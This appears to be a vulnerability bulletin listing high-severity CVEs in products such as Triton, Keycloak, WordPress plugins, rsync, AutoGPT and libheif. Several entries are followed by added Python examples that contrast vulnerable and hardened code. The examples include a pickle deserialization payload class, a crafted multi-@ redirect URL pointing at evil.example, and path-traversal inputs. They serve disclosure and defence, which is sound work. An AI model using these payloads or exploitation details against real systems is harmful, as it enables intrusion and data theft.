NVIDIA–TensorRT NVIDIA TensorRT contains a vulnerability where an attacker could cause an out-of-bounds write. A successful exploit of this vulnerability might lead to data tampering. 2026-05-20 8.2 CVE-2026-24188
NVIDIA–TensorRT-LLM NVIDIA TRT-LLM for any platform contains a vulnerability in MPI server, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. 2026-05-20 7.5 CVE-2025-33255
NVIDIA–TensorRT-LLM NVIDIA TRT-LLM for any platform contains a vulnerability in RPC testing, where an attacker could cause an unsafe deserialization. A successful exploit of this vulnerability might lead to code execution, denial of service, data tampering, and information disclosure. 2026-05-20 7.5 CVE-2026-24163
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure. 2026-05-20 9.8 CVE-2026-24207
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, data tampering, denial of service, or information disclosure. 2026-05-20 8 CVE-2026-24213
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability in the DALI backend where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to code execution, data tampering, or denial of service. 2026-05-20 8 CVE-2026-24214
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an authentication bypass. A successful exploit of this vulnerability might lead to escalation of privileges, denial of service, or information disclosure. 2026-05-20 7.3 CVE-2026-24206
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause a path traversal issue. A successful exploit of this vulnerability might lead to denial of service. 2026-05-20 7.5 CVE-2026-24209
NVIDIA–Triton Inference Server NVIDIA Triton Inference Server contains a vulnerability where an attacker could cause an integer overflow. A successful exploit of this vulnerability might lead to denial of service. 2026-05-20 7.5 CVE-2026-24210
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in incs/remotes.inc.php where latitude, longitude, callsign, mph, altitude, and timestamp values parsed from external GPS tracking service XML/JSON responses (InstaMapper and Google Latitude integration) are concatenated into UPDATE and INSERT statements without sanitization. An attacker able to compromise or impersonate the remote GPS tracker endpoint can inject SQL to manipulate the responder location, tracks, and assignment tables. 2026-05-21 8.2 CVE-2026-48235
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains hardcoded MySQL database credentials in loader.php (a public-facing database utility) that are committed to the source repository. Any actor with access to the public source tree (or an unauthenticated attacker with read access to the file on a deployed installation) can read the username, password, and database name and use them to connect to the database if it is reachable from their network. 2026-05-21 8.1 CVE-2026-48241
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains hardcoded MySQL database connection credentials (host, username, password, database name) in import_mdb.php. The credentials are embedded in source code committed to the public repository, allowing any reader of the source to obtain valid configuration values that may match deployed installations. 2026-05-21 8.1 CVE-2026-48242
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in tables.php where multiple POST parameters (tablename, indexname, sortby) are concatenated into table/column identifiers in dynamically constructed SELECT/UPDATE/DELETE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48231
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/fullsit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48232
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/sit_incidents.php where the offset GET parameter is concatenated into the LIMIT clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48233
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in portal/ajax/list_requests.php where the sort and dir GET parameters are concatenated into the ORDER BY clause of a SELECT statement without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48234
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in db_loader.php where multiple POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) are concatenated into mysqli connection arguments and dynamic SQL operating against an attacker-controlled database without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48236
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in message.php where the frm_ticket_id and frm_resp_id POST parameters are concatenated into WHERE clauses of SELECT/UPDATE statements without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48237
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/mobile_main.php where the id GET parameter is concatenated into the WHERE clause of a SELECT statement used as a ticket-existence sanity check without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48238
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/reports.php where the tick_id POST parameter is concatenated into the WHERE clause of SELECT statements in the incidents summary report without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48239
Open ISES–Tickets Open ISES Tickets before 3.44.2 contains a SQL injection vulnerability in ajax/statistics.php where the tick_id and f_tick_id POST parameters are concatenated into WHERE clauses of SELECT statements in the statistics rollup queries without sanitization. Authenticated attackers can craft requests that alter query semantics to read, modify, or destroy database contents. 2026-05-21 7.1 CVE-2026-48240
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a remote attacker to execute arbitrary code in pre-installed apps. 2026-05-19 8.1 CVE-2026-24792
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a local attacker to cause a DoS from which the system cannot recover. 2026-05-19 8.4 CVE-2026-25781
OpenHarmony–OpenHarmony OpenHarmony v6.0 and prior versions allow a remote attacker to execute arbitrary code in pre-installed apps. 2026-05-19 8.8 CVE-2026-27648
OPPO–O+ Connect A local privilege escalation vulnerability exists in O+ Connect because it fails to validate the identity of the caller on the pipe interface. 2026-05-19 7.3 CVE-2026-22069
Piotnet–Piotnet Addons For Elementor Pro The Piotnet Addons for Elementor Pro plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the ‘pafe_ajax_form_builder’ function in all versions up to, and including, 7.1.70. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability can only be exploited if a file field is added to the form. 2026-05-19 9.8 CVE-2026-4885
Piotnet–Piotnet Forms The Piotnet Forms plugin for WordPress is vulnerable to arbitrary file upload due to missing file type validation in the ‘piotnetforms_ajax_form_builder’ function in all versions up to, and including, 2.1.40. The plugin uses an incomplete extension blacklist that only blocks php, phpt, php5, php7, and exe extensions, while allowing dangerous extensions such as .phar or .phtml to be uploaded. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability can only be exploited if a file field is added to the form. 2026-05-19 9.8 CVE-2026-4883
PixelYourSite–Boost The Boost plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.0.3 via deserialization of untrusted input in the STYXKEY-BOOST_USER_LOCATION cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. 2026-05-20 9.8 CVE-2026-7637
PixelYourSite–Boost The Boost plugin for WordPress is vulnerable to time-based SQL Injection via the ‘current_url’ and ‘user_name’ parameters in versions up to, and including, 2.0.3 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. 2026-05-20 7.5 CVE-2026-9010
pixelyoursite–Cost of Goods by PixelYourSite The Cost of Goods by PixelYourSite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘csvdata[0][cost_of_goods_value]’ parameter in versions up to, and including, 1.2.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-05-20 7.2 CVE-2026-7613
PosCube Hardware Software and Consulting Ltd.–QR Menu Authorization bypass through User-Controlled key vulnerability in PosCube Hardware Software and Consulting Ltd. QR Menu allows Exploitation of Trusted Identifiers. This issue affects QR Menu: through 21052026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-21 7.5 CVE-2025-13479
PowerDNS–Authoritative Insufficient Validation of Autoprimary SOA Queries 2026-05-21 7.5 CVE-2026-42001
projectworlds–hospital-management-system-in-php A flaw has been found in projectworlds hospital-management-system-in-php 1.0. Affected by this vulnerability is the function getAllPatientDetail of the file update_info.php of the component GET Parameter Handler. Executing a manipulation of the argument appointment_no can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. The project was informed of the problem early through an issue report but has not responded yet. 2026-05-18 7.3 CVE-2026-8785
projectworlds–Online Art Gallery Shop A flaw has been found in projectworlds Online Art Gallery Shop 1.0. Impacted is an unknown function of the file /admin/adminHome.php. Executing a manipulation of the argument social_linked can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. 2026-05-24 7.3 CVE-2026-9364
prosolution–ProSolution WP Client The ProSolution WP Client plugin for WordPress is vulnerable to Arbitrary File Upload in versions up to, and including, 2.0.0. This is due to an array validation mismatch where only the first file in the upload array undergoes extension and MIME type validation, while all files are processed and uploaded to a web-accessible directory. This makes it possible for unauthenticated attackers to upload malicious PHP files and achieve remote code execution by sending a valid first file followed by a malicious file. 2026-05-20 9.8 CVE-2026-6555
Red Hat–Red Hat build of Keycloak 26.2 A flaw was found in Keycloak’s URL validation logic during redirect operations. By crafting a malicious request, an attacker could bypass validation to redirect users to unauthorized URLs, potentially leading to the exposure of sensitive information within the domain or facilitating further attacks. This vulnerability specifically affects Keycloak clients configured with a wildcard (*) in the “Valid Redirect URIs” field and requires user interaction to be successfully exploited. The issue stems from a discrepancy in how Keycloak and the underlying Java URI implementation handle the user-info component of a URL. If a malicious redirect URL is constructed using multiple @ characters in the user-info section, Java’s URI parser fails to extract the user-info, leaving only the raw authority field. Consequently, Keycloak’s validation check fails to detect the malformed user-info, falls back to a wildcard comparison, and incorrectly permits the malicious redirect. 2026-05-19 8.1 CVE-2026-7504
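A redirect-URI allowlist check that never has to agree with a URI parser about where user-info ends, as an added Python example that is not Keycloak's code: any `@` in the authority is rejected outright (a redirect target never legitimately carries credentials), the host and port are then compared exactly, and only the path is matched against a trailing `/*` wildcard. The allowlist format, the refusal of a bare `*` entry, and the hostnames are this example's assumptions.

```python
from urllib.parse import urlsplit


def check_redirect(candidate: str, allowed) -> bool:
    """True only if candidate matches an allowed entry by scheme, host, port and path."""
    if "*" in allowed:
        raise ValueError('a bare "*" redirect entry is not a usable allowlist')
    if "\\" in candidate:
        return False                    # browsers may reinterpret "\" as "/"; do not guess
    parts = urlsplit(candidate)
    if parts.scheme not in ("https", "http") or not parts.netloc:
        return False
    # Any "@" in the authority means user-info is present or is being faked. Reject it
    # rather than splitting on the first or the last "@" and hoping the parser that
    # validates agrees with the parser that later follows the redirect.
    if "@" in parts.netloc:
        return False
    try:
        host, port = parts.hostname, parts.port   # hostname is lower-cased by urlsplit
    except ValueError:
        return False                    # non-numeric or out-of-range port
    path = parts.path or "/"
    for entry in allowed:
        a = urlsplit(entry)
        if (a.scheme, a.hostname, a.port) != (parts.scheme, host, port):
            continue
        if a.path.endswith("/*"):
            if path.startswith(a.path[:-1]):      # prefix that ends in "/"
                return True
        elif path == (a.path or "/"):
            return True
    return False


# Constructed allowlist for a single client.
ALLOWED = ["https://app.example.com/*"]
```

The multi-`@` input from the description, `https://app.example.com@x@evil.example/`, is refused before any host comparison happens; the cost is that legitimate redirect URIs containing user-info are also refused, which is the right trade for an OAuth redirect target.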
Red Hat–Red Hat build of Keycloak 26.2 A flaw was found in Keycloak. A remote, unauthenticated attacker can send a specially crafted XML input to the Security Assertion Markup Language (SAML) endpoint. This malicious input can cause high CPU usage and worker thread starvation, leading to a Denial of Service (DoS) where the server becomes unavailable. 2026-05-19 7.5 CVE-2026-7307
Red Hat–Red Hat build of Keycloak 26.2 A session fixation vulnerability was found in Keycloak’s login-actions endpoints. An unauthenticated attacker could exploit this flaw by pre-creating an authentication session and tricking a victim into visiting a maliciously crafted link. By leveraging the /login-actions/restart endpoint, which processes session handles without adequate CSRF protection or cookie ownership validation, an attacker can reset the authentication flow state. This causes Single Sign-On (SSO) to authenticate the victim transparently upon clicking the link, allowing the attacker to hijack the required-action form without needing the victim’s credentials. A successful exploit could lead to complete account takeover, including highly privileged administrative accounts. 2026-05-19 7.5 CVE-2026-7507
Red Hat–Red Hat build of Keycloak 26.4 A flaw was found in Keycloak. A low-privilege user, with knowledge of user credentials and client ID, can bypass a security control intended to disable the implicit flow in OpenID Connect (OIDC) clients. By manipulating client data during a session restart, an attacker can obtain an access token that should not be available. This vulnerability can also lead to the exposure of these access tokens in server logs, proxy logs, and HTTP Referrer headers, resulting in sensitive information disclosure. 2026-05-19 7.1 CVE-2026-7571
Red Hat–Red Hat Directory Server 11 A flaw was found in 389-ds-base. The get_ldapmessage_controls_ext() function in the LDAP server does not enforce an upper bound on the number of controls per LDAP message. A remote, unauthenticated attacker can send a specially crafted LDAP request containing hundreds of thousands of minimal controls within the default maximum BER message size (2 MB), causing excessive CPU consumption and heap allocation on the server. Under concurrent exploitation, this leads to significant latency degradation, worker thread starvation, or out-of-memory termination, resulting in a denial of service. 2026-05-20 7.5 CVE-2026-9064
Red Hat–Red Hat Hardened Images A flaw was found in gnutls. A remote attacker could exploit an issue in the Datagram Transport Layer Security (DTLS) packet reordering logic. The comparator function, responsible for ordering DTLS packets by sequence numbers, did not correctly handle packets with duplicate sequence numbers. This could lead to unstable packet ordering or undefined behavior, resulting in a denial of service. 2026-05-18 7.5 CVE-2026-42009
Redaxo–Redaxo CMS Mediapool Redaxo CMS Mediapool Addon 5.5.1 and older contains an arbitrary file upload vulnerability that allows authenticated users to bypass file extension blacklist restrictions. Attackers with editor accounts can upload executable files by using obfuscated extensions like php71 or php53 to evade the blacklist filter and execute arbitrary code. 2026-05-23 8.8 CVE-2018-25353
Repute Infosystems–BookingPress Appointment Booking Pro The BookingPress Pro plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ‘bookingpress_validate_submitted_booking_form_func’ function in all versions up to, and including, 5.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site’s server which may make remote code execution possible. Note: The vulnerability can only be exploited if a signature custom field is added to the booking form. 2026-05-21 9.8 CVE-2026-6960
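The upload-validation failure modes collected in the Piotnet, ProSolution, Redaxo Mediapool and BookingPress entries above (an incomplete extension blacklist; validating only the first file of a multi-file upload; no validation at all on one field), contrasted with an allowlist applied to every extension of every file, as an added Python example that belongs to none of those plugins. The blacklist is the one the Piotnet entries quote; the allowlist contents are this example's assumption of what a booking or contact form actually needs.

```python
BLACKLIST = {"php", "phpt", "php5", "php7", "exe"}       # the incomplete list quoted above
ALLOWLIST = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}  # assumption: what the form needs


def blacklist_allows(filename: str) -> bool:
    """The weak pattern: anything whose last extension is not on the list gets through."""
    return filename.rsplit(".", 1)[-1].lower() not in BLACKLIST


def validate_one(filename: str) -> str:
    """Return the sanitized basename or raise ValueError."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any client-supplied path
    if not name or name.startswith("."):
        raise ValueError(f"rejected {filename!r}: empty or hidden name")
    parts = name.lower().split(".")
    if len(parts) < 2:
        raise ValueError(f"rejected {filename!r}: no extension")
    # Every extension of a multi-dot name must be allowed, so 'shell.phtml', 'x.php71'
    # and 'shell.php.png' all fail regardless of how the web server maps handlers.
    for ext in parts[1:]:
        if ext not in ALLOWLIST:
            raise ValueError(f"rejected {filename!r}: extension {ext!r} not allowed")
    return name


def validate_first_only(filenames) -> list:
    """Mirrors the array mismatch: only filenames[0] is checked, yet all are accepted."""
    validate_one(filenames[0])
    return list(filenames)


def validate_all(filenames) -> list:
    """Every file in the upload array is validated before any of them is stored."""
    return [validate_one(f) for f in filenames]


def rejects(filenames) -> bool:
    try:
        validate_all(filenames)
    except ValueError:
        return True
    return False
```

`validate_first_only(["logo.png", "shell.php"])` returns both names, which is the ProSolution bug in miniature; `validate_all` raises on the second file, and the allowlist makes the `.phar`, `.phtml` and `php71` variants moot without anyone having to enumerate them.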
RsyncProject–rsync Rsync version 3.4.2 and prior contain an integer overflow vulnerability in the compressed-token decoder where a 32-bit signed counter is not checked for overflow, allowing a malicious sender to trigger an overflow that causes the receiver process to read and return data from outside the intended buffer bounds. Attackers can exploit this vulnerability to disclose process memory contents including environment variables, passwords, heap and stack data, and library memory pointers, significantly reducing ASLR effectiveness and facilitating further exploitation. 2026-05-20 8.1 CVE-2026-43618
RsyncProject–rsync Rsync versions before 3.4.3 contain a time-of-check to time-of-use (TOCTOU) race condition in daemon file handling that allows attackers to redirect file writes outside intended directories by replacing parent directory components with symbolic links. Attackers with write access to a module path can exploit this race condition to create or overwrite arbitrary files, potentially modifying sensitive system files and achieving privilege escalation when the daemon runs with elevated privileges. This vulnerability can only be triggered if the chroot setting is false. 2026-05-20 7 CVE-2026-29518
ruby-lang–Ruby An issue was discovered in Ruby 4 before 4.0.5. A race condition leading to a use-after-free in the pthread-based getaddrinfo timeout handler (rb_getaddrinfo in ext/socket/raddrinfo.c) allows a remote attacker who can delay DNS responses near the user-specified timeout to crash a Ruby process that calls Addrinfo.getaddrinfo(…, timeout:) or Socket.tcp(…, resolv_timeout:). Memory-corruption-based exploitation is theoretically possible. The attack could, for example, be carried out through a crafted authoritative DNS server or recursive resolver. 2026-05-22 8.1 CVE-2026-46727
Samsung Open Source–Escargot Use after free vulnerability in Samsung Open Source Escargot allows Pointer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 7.8 CVE-2026-47310
Samsung Open Source–Escargot Heap-based buffer overflow vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 7.8 CVE-2026-47311
Samsung Open Source–Escargot Out-of-bounds write vulnerability in Samsung Open Source Escargot allows Overflow Buffers. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. 2026-05-19 7.8 CVE-2026-47314
SigmaPlugin–Advanced Database Cleaner Premium The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the ‘template’ parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. 2026-05-20 8.8 CVE-2026-7522
Significant-Gravitas–AutoGPT AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.6.36 through 0.6.50 are vulnerable to Authenticated Session Hijacking via IDOR. If an authenticated attacker can determine the session_id of another user’s session, they can take it over, reading any messages in it and locking the legitimate user out. The PATCH /sessions/{session_id}/assign-user endpoint authenticates the caller but never verifies session ownership: the service layer invokes the session lookup with user_id=None, which the data access layer interprets as a privileged/system call that bypasses the ownership filter, allowing any authenticated user to reassign an arbitrary session to themselves. This issue has been patched in version 0.6.51. 2026-05-18 7.1 CVE-2026-30950
Significant-Gravitas–AutoGPT AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. Versions 0.4.2 through 0.6.51 are vulnerable to an unauthenticated Denial of Service (DoS) through the server due to uncontrolled disk space consumption. The download_agent_file endpoint creates persistent temporary files for every request but fails to delete them after they are served. An unauthenticated attacker can repeatedly call this endpoint to exhaust the server’s disk space, causing the database or other system services to fail due to “No space left on device” errors, rendering the entire AutoGPT Platform backend unavailable to all users. This issue has been patched in version 0.6.52. 2026-05-19 7.5 CVE-2026-33232
Significant-Gravitas–AutoGPT AutoGPT is a workflow automation platform for creating, deploying, and managing continuous artificial intelligence agents. In versions 0.6.34 through 0.6.51, the backend deserializes Redis cache bytes using pickle.loads without integrity/authenticity checks. The write path serializes values with pickle.dumps(…) into Redis and the read path blindly invokes pickle.loads(…) on bytes with no HMAC/signature or strict schema validation gating deserialization. If an attacker can poison a shared-cache key in Redis, arbitrary command execution is possible in the backend container context, affecting confidentiality, integrity, and availability. This issue has been fixed in version 0.6.52. 2026-05-19 7.6 CVE-2026-33233
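The pickle deserialization issue above, as an added example that is not AutoGPT's code: a dict stands in for Redis, a poisoned key shows that `pickle.loads` runs attacker code on read, and the hardened path stores JSON with an HMAC-SHA256 tag (bound to the cache key) that is verified before anything is decoded. The secret key and cache key names are constructed for the demo.

```python
# Added example, not AutoGPT's code: blind pickle.loads on a shared cache
# versus an HMAC-gated JSON cache. The dict `redis` stands in for Redis.
import hashlib
import hmac
import json
import pickle

EXECUTED = []  # records side effects caused purely by deserialization


def _attacker_side_effect(tag):
    EXECUTED.append(tag)


class Poison:
    """pickle invokes the callable returned by __reduce__ on load; an attacker
    who can write this blob into the cache runs that callable in the backend."""

    def __reduce__(self):
        return (_attacker_side_effect, ("pwned",))


# --- vulnerable pattern: pickle.dumps on write, pickle.loads on read, no check
def cache_set_vulnerable(cache, key, value):
    cache[key] = pickle.dumps(value)


def cache_get_vulnerable(cache, key):
    return pickle.loads(cache[key])


# --- hardened pattern: JSON body + HMAC-SHA256 tag, verified before decoding
SECRET = b"constructed-demo-key-keep-out-of-redis"
TAG_LEN = hashlib.sha256().digest_size  # 32


def _tag(key, body, secret):
    # The key is mixed into the MAC so a valid blob cannot be replayed under
    # a different cache key.
    return hmac.new(secret, key.encode() + b"\0" + body, hashlib.sha256).digest()


def cache_set_signed(cache, key, value, secret=SECRET):
    body = json.dumps(value, separators=(",", ":"), sort_keys=True).encode()
    cache[key] = _tag(key, body, secret) + body


def cache_get_signed(cache, key, secret=SECRET):
    blob = cache[key]
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    if not hmac.compare_digest(tag, _tag(key, body, secret)):
        raise ValueError(f"cache entry {key!r} failed integrity check")
    return json.loads(body)  # JSON cannot express callables, unlike pickle


def demo():
    """Returns (pickle_ran_attacker_code, signed_roundtrip_value, tamper_rejected)."""
    EXECUTED.clear()
    redis = {}
    cache_set_vulnerable(redis, "shared:config", {"model": "gpt"})
    redis["shared:config"] = pickle.dumps(Poison())       # attacker poisons the key
    cache_get_vulnerable(redis, "shared:config")          # backend reads it back
    pickle_ran = EXECUTED == ["pwned"]

    cache_set_signed(redis, "shared:config", {"model": "gpt"})
    value = cache_get_signed(redis, "shared:config")
    redis["shared:config"] = redis["shared:config"][:TAG_LEN] + b'{"model":"evil"}'
    try:
        cache_get_signed(redis, "shared:config")
        rejected = False
    except ValueError:
        rejected = True
    return pickle_ran, value, rejected
```

Two points the code makes that the advisory only implies: the format change (JSON instead of pickle) is what removes code execution, and the MAC is what removes silent data poisoning; an attacker with Redis write access who also holds the HMAC secret defeats the MAC, so the secret must live with the backend, never in the cache itself.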
Sipp–SIPp SIPp 3.6 and earlier contains a local buffer overflow vulnerability in command-line argument handling that allows local attackers to crash the application or execute arbitrary code. Attackers can trigger the vulnerability by supplying oversized input to the -3pcc, -i, or -log_file parameters, causing strcpy to write beyond buffer boundaries in sipp.cpp. 2026-05-23 8.4 CVE-2018-25356
Sitemio Information Technologies Trade Ltd. Co.–WISECP Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery. This issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2026-05-20 8 CVE-2025-11954
SourceCodester–Hospitals Patient Records Management System A flaw has been found in SourceCodester Hospitals Patient Records Management System 1.0. The impacted element is an unknown function of the file /classes/Master.php?f=save_patient_history. Manipulation of the argument ID causes SQL injection. The attack can be carried out remotely. The exploit has been published and may be used. 2026-05-24 7.3 CVE-2026-9355
SourceCodester–Hospitals Patient Records Management System A vulnerability has been found in SourceCodester Hospitals Patient Records Management System 1.0. This affects an unknown function of the file /admin/patients/manage_history.php. Manipulation of the argument ID leads to SQL injection. The attack can be performed remotely. The exploit has been disclosed to the public and may be used. 2026-05-24 7.3 CVE-2026-9356
Splunk–Splunk Enterprise In Splunk Enterprise versions below 10.2.2 and 10.0.5, and Splunk Cloud Platform versions below 10.3.2512.8, 10.2.2510.11, 10.1.2507.21, and 10.0.2503.13, a user with a role that has access to the `_internal` index could view session cookies and response bodies that contain sensitive data. 2026-05-20 7.5 CVE-2026-20239
Splunk–Splunk Enterprise In Splunk Enterprise versions below 10.2.2, 10.0.5, 9.4.11, and 9.3.12, and Splunk Cloud Platform versions below 10.4.2603.1, 10.3.2512.9, 10.2.2510.11, 10.1.2507.21, 10.0.2503.13, and 9.3.2411.129, a low-privileged user that does not hold the ‘admin’ or ‘power’ Splunk roles could cause a Denial of Service by exploiting the `coldToFrozen.sh` script in the `splunk_archiver` app to rename critical Splunk directories, making the instance non-functional. The Denial of Service is possible because of missing input validation in the `coldToFrozen.sh` script, which accepts arbitrary file paths and renames them without restricting operations to safe directories. 2026-05-20 7.1 CVE-2026-20240
steipete–summarize Summarize prior to 0.15.1 contains a path traversal vulnerability in the /v1/summarize daemon endpoint that allows authenticated callers to write files to arbitrary directories by supplying an absolute path or directory traversal sequence in the slidesDir request parameter. Attackers can exploit this to write slide_*.png and slides.json files to any writable directory and subsequently delete matching files at the specified location through repeat extraction. 2026-05-18 7.1 CVE-2026-45242
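Confining a caller-supplied output directory such as slidesDir, as an added example (this is not summarize's code): the requested path is joined to an allowed base and fully resolved before a prefix check, which rejects absolute paths, `..` sequences and symlinks that leave the base. The base directory and function name are hypothetical; the demo builds its own temporary tree.

```python
# Added example, not summarize's code: confine a user-supplied output directory
# (the advisory's slidesDir) to an allowed base before writing or deleting there.
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    pass


def resolve_slides_dir(base: str, requested: str) -> Path:
    """Return base/requested only if it still lies inside base after resolution."""
    base_p = Path(base).resolve()
    # Path joining discards `base` entirely when `requested` is absolute, which
    # is the bug class in the advisory; resolve() then collapses '..' and
    # symlinks so the prefix check below is made on real locations.
    candidate = (base_p / requested).resolve()
    if candidate != base_p and base_p not in candidate.parents:
        raise UnsafePath(f"{requested!r} escapes {base_p}")
    return candidate


def demo():
    """Returns allowed/rejected verdicts for: plain name, '..' escape,
    absolute path outside base, and a '..' that stays inside base."""
    with tempfile.TemporaryDirectory() as td:
        base = Path(td) / "summaries"
        base.mkdir()
        victim = Path(td) / "victim"
        victim.mkdir()
        (victim / "slides.json").write_text("constructed: would be overwritten/deleted")
        requests = ["job-42", "../victim", str(victim), "a/../b"]
        verdicts = []
        for req in requests:
            try:
                resolve_slides_dir(str(base), req)
                verdicts.append("allowed")
            except UnsafePath:
                verdicts.append("rejected")
        return verdicts
```

Checking the resolved path (rather than the string) is what makes the `..` and absolute-path cases fall out of one comparison; a string prefix test such as `requested.startswith(base)` would still accept `/base/../victim` and `/base-other/`.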
steipete–summarize Summarize prior to 0.15.1 contains a vulnerability in the hover summary feature that allows malicious pages to dispatch synthetic mouseover events over attacker-controlled links, causing the extension to make authenticated daemon requests using stored tokens without verifying event trustworthiness. Attackers can place local or private-network URLs behind hoverable links to route authenticated requests through the daemon, potentially accessing sensitive internal endpoints when users interact with attacker-controlled content. 2026-05-18 7.4 CVE-2026-45245
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and prior contain a heap-buffer-overflow (write) vulnerability in the grid tile compositing, allowing an attacker to write 64 bytes of fully attacker-controlled data past the end of a chroma plane heap allocation by crafting a HEIF/AVIF file with a 1×4 grid of odd-height tiles. The overflow is triggered during normal image decoding with default build configuration. The written bytes are chroma (Cb/Cr) pixel values from the attacking tile, giving the attacker full control over the overflow content. This issue has been fixed in version 1.22.0. 2026-05-19 8.8 CVE-2026-32740
strukturag–libheif libheif is a HEIF and AVIF file format decoder and encoder. Versions 1.21.2 and below contain a heap buffer overflow in MaskImageCodec::decode_mask_image(). When decoding a HEIF file containing a mask image (mski), the function copies the full iloc extent data into a pixel buffer using memcpy(dst, data.data(), data.size()). The copy length data.size() is determined by the iloc extent in the file (attacker-controlled), while the destination buffer is sized based on the declared image dimensions. Because no upper-bound check exists on the data length, a crafted file whose iloc extent exceeds the pixel buffer allocation overflows the heap. The vulnerable single-memcpy branch is reached when the mskC property specifies bits_per_pixel = 8 and the ispe property declares an even width ≥ 64 (so that stride == width), with no changes to default security limits or external codec plugins required. This issue has been fixed in version 1.22.0. 2026-05-19 7.1 CVE-2026-32741
